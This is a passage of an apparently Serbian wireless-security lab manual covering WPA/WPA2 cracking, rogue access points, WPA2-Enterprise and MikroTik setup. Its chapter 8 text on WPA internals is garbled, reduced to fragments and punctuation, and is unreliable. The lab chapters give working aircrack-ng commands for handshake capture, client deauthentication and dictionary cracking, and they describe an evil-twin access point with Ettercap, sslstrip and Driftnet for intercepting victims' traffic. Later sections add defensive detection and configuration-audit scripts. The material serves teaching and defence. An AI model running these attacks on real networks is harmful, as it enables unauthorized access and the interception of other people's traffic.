8. WPA/WPA2
8.1
WEP .
IEEE 2001.
.
IEEE 802.11i (WPA230). ,
Wi-Fi ,
, -
WEP . ,
IEEE .
WEP
. 2003. Wi-Fi WPA ,
2004. IEEE 802.11i , WPA2.
WPA WPA2 . WPA RC4
, WPA2 AES . WPA RC4
WEP. RC4
, WPA
WEP .
8.2 WPA/WPA2
WPA-PSK WPA2-PSK
WEP , WPA/WPA2 .
PMK33 256 . WPA-PSK WPA2-PSK, PMK
(PSK) (
8 63 ASCII ).
8.1 : WPA/WPA2
PMK,
(PTK34). ,
.
PTK :
PMK,
(A-nonce),
34 Pairwise transient key
(S-nonce),
MAC ,
MAC .
PTK
e .
MIC35
. MIC hash
.
PMK PTK ,
PTK hash .
PMK.
WPA-PSK WPA2-PSK
.
. -
hash PMK. ,
WPA WPA2
.
8.1 PMK (PSK) 4096
hash . 4096 hash
.
, .
8.1 PMK PSK,
SSID . PMK
PSK, SSID PMK .
WPA WPA2 . WPA WPA2
PMK . MIC
.
.
.
aircrack-ng PSK.
aircrack-ng A-nonce S-nonce MIC.
MIC MIC
, PSK .
35 Message Integrity Protocol
:
airodump-ng
WPA-PSK/WPA2-PSK ,
;
aireplay-ng
.
,
.
aircrack-ng
hash .
:
:
airmon-ng start wlan0
airodump-ng
WPA-PSK/WPA2-PSK :
airodump-ng mon0
8.2 : WPA-PSK/WPA2-PSK
:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk_snimak mon0
:
-c 9 ,
--bssid 00:14:6C:7E:40:80 ,
-w psk_snimak .
aireplay-ng .
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0
:
-0 ,
-a 00:14:6C:7E:40:80 - ,
-c 00:0F:B5:88:AC:82 - .
airodump-ng
( 8.3), airecrack-ng :
aircrack-ng -w /pentest/passwords/jtr/password.lst -b 00:14:6C:7E:40:80 psk_snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
psk_snimak*.cap .
-w /pentest/passwords/jtr/password.lst -.
8.3 :
8.4.
116
8.4 : aircrack-ng
1: WPA
WPA-PSK .
: password PMK .
.
WPA-PSK .
.
8.4 Protecting WPA-PSK/WPA2-PSK networks
The only practical attack on WPA-PSK/WPA2-PSK is the dictionary attack above, so the defence is a passphrase that no dictionary contains (see the password recommendations in Chapter IV).
Configuring a Windows client for a WPA/WPA2 network:
1. Open the Control Panel and the wireless network connection.
2. Open its Properties.

Figure 8.5: Wireless network properties
5. On the wireless networks tab (Figure 8.5) click Add.
6. Enter the SSID, the security type and the PSK (Figure 8.6).

Figure 8.6: Adding a WPA/WPA2 network
Configuring a Linux client for a WPA/WPA2 network with wpa_supplicant:
1. With a text editor (e.g. nano) create the file wpa_supplicant.conf with the following contents:
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
ap_scan=1
fast_reauth=1
network={
    # name of the network
    ssid="ESSID"
    # WPA with TKIP, as used in the lab; for WPA2 use proto=RSN and pairwise=CCMP
    proto=WPA
    key_mgmt=WPA-PSK
    pairwise=TKIP
    # the pre-shared key (8 to 63 characters)
    psk="passphrase"
}
2. Start wpa_supplicant on the wireless interface with that configuration:
wpa_supplicant -i wlan0 -c wpa_supplicant.conf
IX
Rogue access points and man-in-the-middle attacks

This chapter shows how an attacker sets up a rogue access point on Linux with the aircrack-ng suite and uses it to intercept the traffic of the clients that connect to it.

9. Rogue access points and man-in-the-middle attacks
9.1 Introduction
A rogue access point is an access point that the owner of the network has not authorized. In this chapter it is a Linux machine with a wireless card, running the aircrack-ng tools.
Figure 9.1: Rogue access point topology
The lab setup is shown in Figure 9.1.
9.2 Setting up the rogue access point
Three components are needed:
1. a DHCP server, which gives the victims an IP address,
2. the access point itself (airbase-ng),
3. routing of the victims' traffic through the attacker's machine.
The DHCP server is configured in /etc/dhcp3/dhcpd.conf. Back up the existing dhcpd.conf and create a new one. The following configuration hands out addresses from 10.0.0.0/24 with the attacker's machine (10.0.0.1) as the gateway:
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bkp
nano /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
range 10.0.0.100 10.0.0.150;
}
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

Airbase-ng, part of the aircrack-ng suite, turns the wireless card into an access point. When started it creates a tap interface (at0) on which the attacker's machine sees the rogue network's traffic; the DHCP server and the routing are bound to that interface. The card must first be put into monitor mode:
airmon-ng start wlan0
9.3 Man-in-the-middle attack
Recovering a well-chosen WPA/WPA2 passphrase by brute force is impractical even with CUDA (GPU) acceleration. A rogue access point gives the attacker another route: instead of breaking the encryption, the attacker becomes the victim's gateway and mounts a man-in-the-middle attack (footnote 36).
36 Man-in-the-middle

Figure 9.2: Man-in-the-middle attack through a rogue access point
The rogue access point is configured as an evil twin: it advertises the same SSID as the legitimate network. Clients that have that SSID saved connect to it automatically, and they prefer whichever access point has the stronger signal, so an attacker closer to the victim than the real access point wins. Once a victim is connected, all of its traffic passes through the attacker's machine, where it can be read and modified.
Traffic in plaintext protocols is exposed immediately. For SSL-protected traffic (https) Ettercap can perform an SSL man-in-the-middle by presenting its own certificate; the browser warns the user, but it has been reported that 76% of users accept such a warning, so Ettercap's SSL interception succeeds often enough to matter. Alternatively, the SSL protection can be stripped altogether so that no warning is ever shown.
The tools used are:
Ettercap, for the man-in-the-middle itself (sniffing and SSL interception);
Sslstrip, which rewrites HTTPS links to HTTP so that the victim's browser never establishes an SSL session;
Driftnet, which extracts images from the TCP streams passing through the attacker's machine;

Figure 9.3: Intercepted traffic on the rogue access point
Exercise 1: evil twin
Set up a rogue access point with the same SSID as the legitimate network, as described above, and observe which access point a client in range of both chooses.
Exercise 2: man-in-the-middle
Intercept the traffic of a client connected to the rogue access point with the tools listed above.
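The evil twin described above is also visible from the defender's side: the same SSID is suddenly served by a BSSID with a different vendor prefix, often without encryption. The following added example (not code from the original manual or from aircrack-ng) parses the access-point table of the CSV that airodump-ng writes with -w (the prefix-01.csv file) and flags SSIDs advertised by several BSSIDs that disagree on security or vendor. The CSV lines are constructed; the MAC addresses and SSID are assumed lab values.

```python
"""Evil-twin detection over an airodump-ng CSV survey.

Added example; the CSV below is constructed to look like airodump-ng output."""
import csv
import io
from collections import defaultdict

# Constructed airodump-ng CSV: two legitimate WPA2 APs of the same vendor on SSID
# BksLab, an open AP from another vendor advertising the same SSID (the evil twin),
# an unrelated network, then the station table that airodump-ng appends.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2012-05-10 19:15:25, 2012-05-10 19:20:01,  9,  54, WPA2, CCMP, PSK, -45,  120,  0,   0.  0.  0.  0,   6, BksLab, 
00:14:6C:7E:40:81, 2012-05-10 19:15:25, 2012-05-10 19:20:01,  9,  54, WPA2, CCMP, PSK, -52,  118,  0,   0.  0.  0.  0,   6, BksLab, 
00:C0:CA:12:34:56, 2012-05-10 19:18:02, 2012-05-10 19:20:01,  6,  54, OPN,  , , -30,   80,  0,   0.  0.  0.  0,   6, BksLab, 
00:1A:2B:3C:4D:5E, 2012-05-10 19:15:30, 2012-05-10 19:20:01, 11,  54, WPA2, CCMP, PSK, -70,   90,  0,   0.  0.  0.  0,   7, Guest-1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:88:AC:82, 2012-05-10 19:16:00, 2012-05-10 19:20:01, -40,  300, 00:C0:CA:12:34:56, BksLab
"""

def parse_airodump_aps(text: str) -> list[dict]:
    """Return the access-point rows of an airodump-ng CSV (the part before the
    blank line that separates it from the station table)."""
    ap_section = text.split("\n\n")[0]
    reader = csv.DictReader(io.StringIO(ap_section.strip()), skipinitialspace=True)
    return [{k.strip(): (v or "").strip() for k, v in row.items() if k} for row in reader]

def find_evil_twins(aps: list[dict]) -> list[str]:
    """Group by ESSID. One ESSID served by BSSIDs that disagree on Privacy (WPA2 vs OPN)
    or come from different OUIs (first three octets) is reported; several APs with the
    same OUI and the same security, a normal multi-AP deployment, are not."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap.get("ESSID"):
            by_essid[ap["ESSID"]].append(ap)
    findings = []
    for essid, group in by_essid.items():
        if len(group) < 2:
            continue
        privacies = {ap["Privacy"] for ap in group}
        ouis = {ap["BSSID"][:8].upper() for ap in group}
        if len(privacies) > 1 or len(ouis) > 1:
            details = ", ".join(f"{ap['BSSID']} ({ap['Privacy']}, ch {ap['channel']})" for ap in group)
            findings.append(f"{essid}: {details}")
    return findings

def demo() -> list[str]:
    return find_evil_twins(parse_airodump_aps(SAMPLE_CSV))

if __name__ == "__main__":
    for line in demo():
        print("possible evil twin ->", line)
```

The signal column (Power) is the other tell: the twin in the sample is the strongest transmitter on its SSID, which is exactly what the attack relies on. A stronger check compares the survey against an inventory of authorized BSSIDs rather than against the other APs in the same scan.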
X
WPA/WPA2-Enterprise

This chapter covers WPA/WPA2-Enterprise: authentication of wireless users against a RADIUS server with IEEE 802.1X and EAP, and a worked configuration on Windows Server.

10. WPA/WPA2-Enterprise
10.1 Introduction
In SOHO networks the pre-shared key (PSK) is the practical choice: WPA-PSK and WPA2-P­SK need nothing but a passphrase on the access point and on the clients. The price is that every user knows the same secret, that the secret has to be changed on every device whenever one user leaves, and that the dictionary attack from Chapter VIII is always available. WPA-Enterprise and WPA2-Enterprise remove the shared secret: every user authenticates individually against a central server, which checks the credentials against a user database (its own files, LDAP, SQL, ...) and can apply policy per user (for example by group membership).
WPA-Enterprise and WPA2-Enterprise are built on IEEE 802.1X and EAP (footnote 37). IEEE 802.1X is port-based network access control: a network port (here, the association with the access point) stays closed for everything except authentication traffic until the user has been authenticated, and is opened for normal traffic only then.
Three parties take part:
the supplicant, the client device that wants to connect;
the authenticator, the device that controls the port, called the network access server (NAS, footnote 38); in a wireless network this is the access point, which must support 802.1X;
the authentication server, which holds the credentials and makes the decision.
The authenticator does not interpret the credentials at all; it relays the exchange between supplicant and authentication server and enforces the result. 802.1X defines how EAP frames are carried between supplicant and authenticator (EAPOL); between authenticator and authentication server they are carried by RADIUS. 802.1X is not limited to wireless networks, but SOHO access points rarely support it, which is one reason such networks use PSK.
RADIUS
The authentication server is a RADIUS server. It receives the EAP exchange from the access point and, once the user is verified, returns the result together with the key material the access point needs for the session. RADIUS (footnote 39) is the protocol between the access point and the server; it runs over UDP/IP, and each access point is registered with the server as a RADIUS client, identified by IP address and protected by a shared secret. WPA-Enterprise is defined in terms of RADIUS, although other AAA protocols exist (DIAMETER, TACACS+, ...).
The supplicant and the authentication server negotiate an EAP method between themselves; the whole EAP conversation is tunnelled through the access point, which forwards it over RADIUS without understanding it (Figure 10.1).
Figure 10.1: 802.1X authentication
The EAP methods most often used in wireless networks are:
EAP-PEAP (footnote 40) with MSCHAPv2 (footnote 41) as the inner method. MSCHAPv2 authenticates the user with a challenge/response computed from the NT hash of the password, which makes it a natural fit for Windows domains: the PEAP supplicant is built into Windows and the server can verify the response against Active Directory.
EAP-TTLS (footnote 42) with PAP (footnote 43), CHAP (footnote 44) or MSCHAPv2 as the inner method. It is natively supported on Linux and Apple Mac clients, while Windows needs a third-party supplicant.
Both methods rely on a PKI (footnote 45): the server presents an X.509 certificate and the client uses it to build a TLS tunnel, inside which the user's credentials are sent. The credentials are therefore never exposed on the wireless network. Only the server needs a certificate; the user is identified inside the tunnel by username and password. The outer identity, sent in clear before the tunnel exists, can be a placeholder (anonymous), so that even the username is hidden from an eavesdropper. The RADIUS server's certificate is issued by a certificate authority (CA, footnote 46) that the clients trust, and the client must check that the certificate chains to that CA: an attacker who sets up a rogue access point with his own RADIUS server (and any certificate) would otherwise receive the MSCHAPv2 challenge/response or, with TTLS/PAP, the password itself (Figure 10.2). Validation of the server certificate is thus the step on which the whole scheme depends.

Figure 10.2: PEAP/EAP-TTLS tunnel and server certificate validation
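The Linux counterpart of the client-side check just described, as an added example that is not code from the original manual: it assumes the client uses wpa_supplicant (as in the WPA-PSK configuration of Chapter VIII) and audits the network={...} blocks of a configuration. Any WPA-EAP block without ca_cert and without a name constraint on the server certificate (domain_suffix_match, domain_match, subject_match or altsubject_match) is reported, because such a client will build the PEAP/TTLS tunnel to whichever RADIUS server an evil twin puts in front of it. The SSID, paths, identities and the password are assumed lab values; the weak and the hardened profile are constructed.

```python
"""Audit wpa_supplicant WPA/WPA2-Enterprise profiles for server-certificate validation.

Added example; the two configurations are constructed."""
import re

NAME_CHECKS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")

# Weak: PEAP without any server validation. The MSCHAPv2 response goes to any
# RADIUS server that answers, rogue or not.
WEAK_CONF = """
network={
    ssid="BksLab-Enterprise"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="mristic"
    password="Password2"
    phase2="auth=MSCHAPV2"
}
"""

# Hardened: the exported CA certificate (converted from DER to PEM) pins the issuer,
# domain_suffix_match pins the server name, and the outer identity is anonymous.
HARDENED_CONF = """
network={
    ssid="BksLab-Enterprise"
    key_mgmt=WPA-EAP
    proto=RSN
    pairwise=CCMP
    eap=PEAP
    anonymous_identity="anonymous@bkslab.edu.rs"   # outer identity, sent in clear
    identity="mristic"
    password="Password2"
    ca_cert="/etc/ssl/certs/bkslab-root-ca.pem"     # assumed path of the lab CA certificate
    domain_suffix_match="bkslab.edu.rs"             # RADIUS server certificate must match
    phase2="auth=MSCHAPV2"
}
"""

def parse_networks(conf: str) -> list[dict]:
    """Minimal parser for wpa_supplicant.conf network blocks: key=value lines,
    surrounding quotes stripped, '#' comments ignored."""
    networks = []
    for block in re.findall(r"network=\{(.*?)\}", conf, re.S):
        net = {}
        for line in block.splitlines():
            line = line.split("#", 1)[0].strip()
            if "=" in line:
                key, value = line.split("=", 1)
                net[key.strip()] = value.strip().strip('"')
        networks.append(net)
    return networks

def audit_enterprise(conf: str) -> list[str]:
    """One finding per weak WPA-EAP profile; an empty list means every profile validates
    the server certificate and does not send a clear-text inner password."""
    findings = []
    for net in parse_networks(conf):
        if "WPA-EAP" not in net.get("key_mgmt", "").split():
            continue
        problems = []
        if not net.get("ca_cert"):
            problems.append("no ca_cert: any server certificate is accepted")
        if not any(net.get(k) for k in NAME_CHECKS):
            problems.append("no domain_suffix_match/subject_match: any certificate from the CA is accepted")
        if net.get("eap", "").upper() == "TTLS" and "AUTH=PAP" in net.get("phase2", "").upper():
            problems.append("TTLS/PAP sends the password in clear inside the tunnel; tunnel validation is all that protects it")
        if problems:
            findings.append(net.get("ssid", "?") + ": " + "; ".join(problems))
    return findings

if __name__ == "__main__":
    print("weak:", audit_enterprise(WEAK_CONF))
    print("hardened:", audit_enterprise(HARDENED_CONF))
```

On Windows the same two settings are the "Validate server certificate" checkbox and the list of trusted root certification authorities in the PEAP properties (Figure 10.22); a profile with validation switched off is the Windows equivalent of WEAK_CONF.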
10.2 Configuring WPA/WPA2-Enterprise on Windows Server
The lab uses one Windows Server machine as domain controller, certificate authority and RADIUS server, an access point that supports WPA2-Enterprise, and a Windows client.
The first step is to promote the server to a domain controller. Click Start, type dcpromo and press Enter.
In the wizard choose Create new domain in a new forest and click Next.

Figure 10.3: Creating a new forest with dcpromo
Enter the domain name, in the lab bkslab.edu.rs, and click Next.

Figure 10.4: Naming the domain
When the wizard asks for the Directory Services Restore Mode administrator password, enter Password2 (the lab value). Continue with Next and click Finish; the server restarts. After the restart, log in as the domain administrator (password Password3 in the lab).
Wireless users are kept in their own organizational unit (OU). Open Start > Administrative Tools > Active Directory Users and Computers.
Right-click the domain (bkslab.edu.rs) and choose New > Organizational Unit.

Figure 10.5: Creating an organizational unit
Name the OU Wireless. Then right-click the OU and choose New > User to create a wireless user.
Figure 10.6: Creating a user

Right-click the OU again and choose New > Group and name the group Wireless. Open the user's properties and use Add to group to put the user into the Wireless group; the group will be used in the RADIUS policy to decide who may connect.
Figure 10.7: Adding the user to the Wireless group
PEAP needs a server certificate, so the server is also made a certificate authority (CA). In Initial Configuration Tasks choose Add roles (footnote 47), select Active Directory Certificate Services and click Next.

Figure 10.8: Adding the Active Directory Certificate Services role
Choose an Enterprise CA, so that the certificate is published to the domain, and click Next.
Figure 10.9: Enterprise CA

In the following steps:
choose Root CA,
choose Create a new private key,
keep the default cryptographic settings and CA name,
keep the default validity period and database locations (Figure 10.10).
Figure 10.10: CA settings
Review the summary and click Install.
To confirm that the server now has a certificate that PEAP can use, open the Microsoft Management Console: Start > type mmc > Enter. In the MMC choose File > Add/Remove Snap-in, select Certificates (Figure 10.11) and click Add, choosing the computer account of the local computer (Figure 10.12).

Figure 10.11: Adding the Certificates snap-in in MMC
Figure 10.12: Certificates snap-in for the local computer

Figure 10.13: The server's certificate
RADIUS server installation

The RADIUS server is the Network Policy Server (NPS). Add the Network Policy and Access Services role with the following role services (Figure 10.15):
Network Policy Server,
Routing and Remote Access Services,
Remote Access Services,
Routing.

Figure 10.15: Network Policy and Access Services role services
RADIUS server configuration
Open the NPS console: Start > type nps.msc > Enter. Under Standard Configuration choose RADIUS server for 802.1X Wireless or Wired Connections and run the wizard (Figure 10.16).

Figure 10.16: NPS standard configuration for 802.1X
Add the access point as a RADIUS client: IP Address: 192.168.1.1 (the address of the access point in the lab) and a shared secret. The RADIUS client (the access point) and the RADIUS server must be configured with the same secret.

Figure 10.17: Adding the access point as a RADIUS client
Select the authentication method Microsoft: Protected EAP (PEAP) and, as the group allowed to connect, the Wireless group.
NPS is now configured as the RADIUS server for the wireless network.
Next, the access point is pointed at the RADIUS server. In its Wireless Security settings (Figure 10.18) choose:
WPA/WPA2 (enterprise mode),
o Version: WPA2,
o Encryption: AES,
o the IP address of the RADIUS server and the RADIUS shared secret (Password12345 in the lab).
The other wireless parameters (SSID, channel, ...) are set as usual.

Figure 10.18: Access point wireless security settings
Clients must trust the CA that issued the RADIUS server's certificate, so the CA certificate is exported from the server and imported on every client. In the MMC, under Certificates (Local Computer Account) > Personal > Certificates, select the CA certificate and choose All Tasks > Export (Figure 10.19).

Figure 10.19: Exporting the CA certificate
Export it without the private key, in DER format, and copy the file to the client.
On the client, import it (Figure 10.20) into the Trusted Root Certification Authorities store. Only then can the client verify the server during PEAP, and only then should the WPA2-Enterprise profile be created.

Figure 10.20: Importing the CA certificate on the client
On a Windows 7 client, connect to the SSID of the access point and open the network's Properties. On the security tab (Security on Windows Vista and Windows 7, Advanced on Windows XP) choose WPA2-Enterprise with AES encryption (Figure 10.21). On Windows XP also tick Enable IEEE 802.1x authentication for this network.

Figure 10.21: Client security settings

Figure 10.22: PEAP settings on the client
In the PEAP settings (Figure 10.22) keep server certificate validation enabled and select the lab CA among the trusted root certification authorities; otherwise the client would accept a rogue RADIUS server.
Connect and, when prompted, enter the credentials of the wireless user created earlier:
Username: mristic
Password: Password2
Exercise 1: WPA2-Enterprise
Set up WPA2-Enterprise as described: a domain with a wireless user, a CA, an NPS RADIUS server and an access point registered as its RADIUS client. Connect a client and confirm the authentication on the RADIUS server.
XI
MikroTik RouterOS

This chapter introduces MikroTik RouterOS and shows how to configure a MikroTik router as a WPA2-protected wireless access point with DHCP, NAT and bandwidth limiting.

11.1 RouterOS
RouterOS is MikroTik's router operating system. It is based on Linux, but unlike a general-purpose Linux distribution it is a closed, purpose-built system that MikroTik ships on its own hardware and also sells for installation on x86 PCs. It covers everything from SOHO routers to service-provider equipment.
Installed on x86 hardware, RouterOS turns an ordinary PC (with suitable network and wireless cards) into a full router. MikroTik's own hardware platform is the RouterBoard (Figure 11.1), built around MIPS (RISC) processors and available in many models. The x86 platform is preferred for CPU-intensive features (L2TP VPN, IPsec VPN, routing at 1 Gbps, ...).
Figure 11.1: RouterBoard
11.2 Accessing a MikroTik router
A MikroTik router can be managed in three ways:
from the command line (SSH/Telnet),
with Winbox (a graphical application for Windows),
through the web interface (in a browser).
The CLI (footnote 49) offers every feature, but Winbox is the most convenient for configuration (the Winbox program itself is small; it loads the DLLs it needs from the router on connection). Winbox is used in the rest of this chapter.
Winbox has one property that is very useful for initial configuration: it can connect at layer 2 of the OSI model, by MAC address, so the router can be reached even if it has no IP address yet or the PC is not in its subnet.
The Winbox login window is shown in Figure 11.2. In the Connect To field (1 in Figure 11.2) enter the router's address; the factory default IP address is 192.168.88.1.
Figure 11.2: Winbox login
Alternatively, Winbox lists the routers it discovers on the local segment and connects to the selected one at layer 2, by MAC address. The default user is admin with no password. Click Connect (2 in Figure 11.2).
11.3 Configuring a MikroTik router as a wireless access point
The lab topology is shown in Figure 11.3.
Figure 11.3: Lab topology
The target configuration is:
the LAN (upstream) interface ether1 has the address 88.88.88.2/20,
the wireless network is called BksMT,
it is protected with WPA2,
wireless clients get addresses from 192.168.50.0/24,
addresses are assigned by a DHCP server on the router,
wireless clients are limited to 1 Mbps.
IP addresses are configured under IP > Addresses. The Address List window opens; click the plus sign to add an address (Figure 11.4).

Figure 11.4: Adding an IP address
Add the address of ether1 to the Address List (the upstream address from the topology). Then add the address of the wireless interface, 192.168.50.1/24 on wlan1; this is the gateway of the wireless clients (Figure 11.5).

Figure 11.5: IP addresses of the router
Next, a wireless security profile is created (Wireless > Security Profiles > Add). The settings are shown in Figure 11.6: dynamic keys, authentication type WPA2 PSK, cipher AES CCM, and the WPA2 pre-shared key.

Figure 11.6: WPA2 security profile
The WPA2 profile is then attached to the wireless interface. Open Wireless > Interfaces and double-click the wireless interface (wlan1). Figure 11.7 shows the settings: mode ap-bridge, SSID BksMT, the frequency band and channel, and the security profile created above; finally enable the interface.

Figure 11.7: Wireless interface settings
Next, the DHCP server for the wireless clients. The easiest way is the wizard IP > DHCP Server > DHCP Setup. Choose wlan1 as the interface on which the DHCP server runs, 192.168.50.0/24 as the address space, the router's own address on wlan1 (192.168.50.1) as the gateway, 192.168.50.2-192.168.50.100 as the pool of addresses to hand out, and the DNS servers the clients should use. Figure 11.8 shows the resulting DHCP server.

Figure 11.8: DHCP server
To give the wireless clients Internet access, source NAT (masquerading) is configured on the upstream interface: traffic from 192.168.50.0/24 leaving through ether1 gets the router's address. Open IP > Firewall > NAT and add a rule with, on the General tab (Figure 11.9):
chain: srcnat,
Src. Address: 192.168.50.0/24,
Dst. Address: 0.0.0.0/0 (any destination),
Out. Interface: ether1.
On the Action tab set the action to masquerade.

Figure 11.9: NAT rule
Finally, bandwidth limiting. MikroTik queues can limit traffic per interface, per address or per client; here a simple queue limits the whole wireless subnet to 1 Mbps. In the terminal (New Terminal in Winbox) enter:
/queue simple add name="1M-korisnici" dst-address=192.168.50.0/24 interface=ether1 direction=both priority=8 queue=default/default limit-at=1000000/1000000 max-limit=1000000/1000000 disabled=no
where:
name is the name of the queue,
dst-address is the address or subnet the queue applies to (the wireless clients);
interface is the interface on which the traffic is measured; ether1 is the upstream interface, so both the clients' uploads and downloads pass through it;
direction is the direction in which the limit applies (both);
priority is the priority of the queue (1 is the highest, 8 the lowest); when several queues compete for bandwidth, queues with a higher priority are served first;
queue is the queue type, as upload/download;
limit-at is the guaranteed bandwidth, in bits per second, as upload/download;
max-limit is the maximum bandwidth, in bits per second, as upload/download;
disabled is whether the queue is disabled (no, so the queue is active).
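The whole configuration of this section entered in the RouterOS terminal instead of the Winbox dialogs, as an added example that is not from the original manual. Addresses, interface names and the SSID are the lab values from above; the upstream gateway 88.88.88.1, the DNS server 8.8.8.8, the pool and profile names, the passphrase and the admin password are assumptions. The queue line uses the same RouterOS 5 syntax as the manual's command (dst-address and interface; RouterOS 6 expresses the same thing with target=).

```routeros
# Added example: Section 11.3 as terminal commands (RouterOS 5 syntax, as in the manual).
# 88.88.88.1, 8.8.8.8, the names, the passphrase and the admin password are assumptions.

# Addresses: upstream on ether1, wireless gateway on wlan1, default route upstream
/ip address add address=88.88.88.2/20 interface=ether1
/ip address add address=192.168.50.1/24 interface=wlan1
/ip route add dst-address=0.0.0.0/0 gateway=88.88.88.1

# WPA2-PSK security profile (AES-CCM only, no WPA/TKIP fallback) and the access point
/interface wireless security-profiles add name=BksMT-wpa2 mode=dynamic-keys \
    authentication-types=wpa2-psk unicast-ciphers=aes-ccm group-ciphers=aes-ccm \
    wpa2-pre-shared-key="ChangeMe-BksMT-2012"
/interface wireless set wlan1 mode=ap-bridge ssid=BksMT security-profile=BksMT-wpa2 disabled=no

# DHCP for the wireless clients: pool, server on wlan1, network parameters
/ip pool add name=wlan-pool ranges=192.168.50.2-192.168.50.100
/ip dhcp-server add name=wlan-dhcp interface=wlan1 address-pool=wlan-pool disabled=no
/ip dhcp-server network add address=192.168.50.0/24 gateway=192.168.50.1 dns-server=8.8.8.8

# Source NAT for the wireless subnet leaving through ether1
/ip firewall nat add chain=srcnat src-address=192.168.50.0/24 out-interface=ether1 action=masquerade

# 1 Mbps simple queue for the wireless subnet (the manual's command)
/queue simple add name="1M-korisnici" dst-address=192.168.50.0/24 interface=ether1 \
    direction=both priority=8 queue=default/default \
    limit-at=1000000/1000000 max-limit=1000000/1000000 disabled=no

# The factory admin account has no password (Section 11.2); set one before the router
# is reachable from the upstream side.
/user set admin password="ChangeMe-admin"
```

The security profile deliberately lists only wpa2-psk and aes-ccm: a profile that also enables wpa-psk with tkip lets a client negotiate down to the RC4-based WPA of Chapter VIII.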
Exercise 1: MikroTik
Configure a MikroTik router as described in this chapter and connect a wireless client to it.
References
[1] [Serbian-language reference; authors and title not legible], 2008.
[2] W. Stallings, Wireless Communications & Networks, Prentice Hall, 2004.
[3] J. Schiller, Mobile Communications, Addison-Wesley, 2003.
[4] W. Osterhage, Wireless Security, Science Publisher, Jersey, 2012.
[5] R. Bartz, CWTS: Certified Wireless Technology Specialist Official Study Guide, John Wiley & Sons, Indianapolis, 2012.
[6] T. Wrightson, Wireless Network Security: A Beginner's Guide, McGraw-Hill, New York, 2012.
[7] A. Orebaugh, G. Ramirez, J. Beale, J. Wright, Wireshark & Ethereal Network Protocol Analyzer Toolkit, Syngress, 2007.
[8] http://www.ve2dbe.com
[9] http://www.backtrack-linux.org
[10] http://www.aircrack-ng.org
[11] http://technet.microsoft.com